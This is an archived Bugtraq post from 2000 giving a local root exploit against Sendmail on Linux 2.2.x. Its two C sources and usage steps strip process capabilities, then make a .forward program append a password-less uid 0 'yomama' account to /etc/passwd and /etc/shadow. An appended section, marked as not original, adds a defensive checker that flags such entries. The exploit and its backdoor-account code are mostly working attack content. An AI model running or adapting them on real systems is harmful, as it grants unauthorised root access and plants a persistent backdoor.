[15250] in bugtraq


Sendmail local root exploit on linux 2.2.x

daemon@ATHENA.MIT.EDU (Florian Heinz)
Thu Jun 8 13:45:12 2000

Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="------------C5AA82A7D9E47C75A576FD13"
Message-Id:  <393F8FDC.882BAEE5@real-linux.de>
Date:         Thu, 8 Jun 2000 14:21:48 +0200
Reply-To: Florian Heinz <sky@REAL-LINUX.DE>
From: Florian Heinz <sky@REAL-LINUX.DE>
To: BUGTRAQ@SECURITYFOCUS.COM

This is a multi-part message in MIME format.
--------------C5AA82A7D9E47C75A576FD13
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hello all,

Attached is a file with 2 sources, ex.c and add.c

compile these 2 and create a file "mail":

From: yomama@foobar.com
To: localuser@localdomain.com
Subject: foo
bar
.

then create a .forward with:
|/path/to/add

then just do: ./ex < mail

This should add a user yomama with uid/gid = 0 and without a password set.
A simple su - yomama should give you root.

This exploit was written by me in a hurry, I hope there are no mistakes

Greets

Florian Heinz
--------------C5AA82A7D9E47C75A576FD13
Content-Type: text/plain; charset=us-ascii;
 name="exploit.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="exploit.c"


-- snip -- ex.c --

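#include <stdlib.h>
#include <unistd.h>
#include <linux/capability.h>

/* capset(2) wrapper from libc; <linux/capability.h> only supplies the types */
int capset(cap_user_header_t header, cap_user_data_t data);

int main (void) {
   cap_user_header_t header;
   cap_user_data_t data;

   header = malloc(8);    /* version + pid */
   data = malloc(12);     /* effective + permitted + inheritable */

   header->pid = 0;       /* 0 = the calling process */
   header->version = _LINUX_CAPABILITY_VERSION;

   /* clear all three capability sets of this process */
   data->inheritable = data->effective = data->permitted = 0;
   capset(header, data);

   /* start sendmail, which takes the recipients from the message on stdin */
   execlp("/usr/sbin/sendmail", "sendmail", "-t", NULL);
}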

-- snap -- ex.c --

-- snip -- add.c --

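#include <fcntl.h>
#include <string.h>
#include <unistd.h>

/* the program named in .forward; sendmail runs it when it delivers the mail */
int main (void) {
   int fd;
   char string[40];

   /* succeeds only if the privilege drop before running the .forward
      program did not take effect */
   seteuid(0);
   /* append a passwd entry with uid 0 and gid 0 */
   fd = open("/etc/passwd", O_APPEND|O_WRONLY);
   strcpy(string, "yomama:x:0:0::/root:/bin/sh\n");
   write(fd, string, strlen(string));
   close(fd);
   /* append the matching shadow entry with an empty password field */
   fd = open("/etc/shadow", O_APPEND|O_WRONLY);
   strcpy(string, "yomama::11029:0:99999:7:::");
   write(fd, string, strlen(string));
   close(fd);

}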

-- snap -- add.c --

--------------C5AA82A7D9E47C75A576FD13--
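
Added example, not part of the original post or its attachment: a C check over passwd(5) and shadow(5) lines for what add.c leaves behind, namely a second UID 0 account and an empty password field. The function names and sample entries are constructed for illustration; on a real host the lines of /etc/passwd and /etc/shadow would be passed in instead.

```c
#include <stdlib.h>
#include <string.h>

/* Copy colon-separated field idx of line into out; -1 if missing or too long. */
static int field(const char *line, int idx, char *out, size_t outsz) {
    const char *p = line;
    while (idx-- > 0) {
        if (!(p = strchr(p, ':'))) return -1;
        p++;
    }
    size_t n = strcspn(p, ":\n");
    if (n >= outsz) return -1;
    memcpy(out, p, n);
    out[n] = '\0';
    return 0;
}

/* passwd(5): name:passwd:UID:GID:...  Flag UID 0 on any account but root. */
int extra_uid0(const char *line) {
    char name[64], uid[32], *end;
    if (field(line, 0, name, sizeof name) || field(line, 2, uid, sizeof uid) || !uid[0])
        return 0;   /* malformed entry: not judged by this check */
    return strtol(uid, &end, 10) == 0 && *end == '\0' && strcmp(name, "root") != 0;
}

/* shadow(5): name:hash:...  Flag an empty hash field (login needs no password). */
int empty_password(const char *line) {
    char hash[256];
    return field(line, 1, hash, sizeof hash) == 0 && hash[0] == '\0';
}

/* Number of lines in lines[0..n) that the given check flags. */
int count_flagged(const char **lines, size_t n, int (*check)(const char *)) {
    int hits = 0;
    for (size_t i = 0; i < n; i++)
        hits += check(lines[i]);
    return hits;
}

/* Constructed sample files; the last entry of each is the line add.c appends. */
const char *SAMPLE_PASSWD[] = { "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/bin/sh", "yomama:x:0:0::/root:/bin/sh" };
const char *SAMPLE_SHADOW[] = { "root:*:11000:0:99999:7:::",
    "daemon:*:11000:0:99999:7:::", "yomama::11029:0:99999:7:::" };

int main(void) {   /* exit status 1 when either sample file has a flagged line */
    return (count_flagged(SAMPLE_PASSWD, 3, extra_uid0)
          + count_flagged(SAMPLE_SHADOW, 3, empty_password)) ? 1 : 0;
}
```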
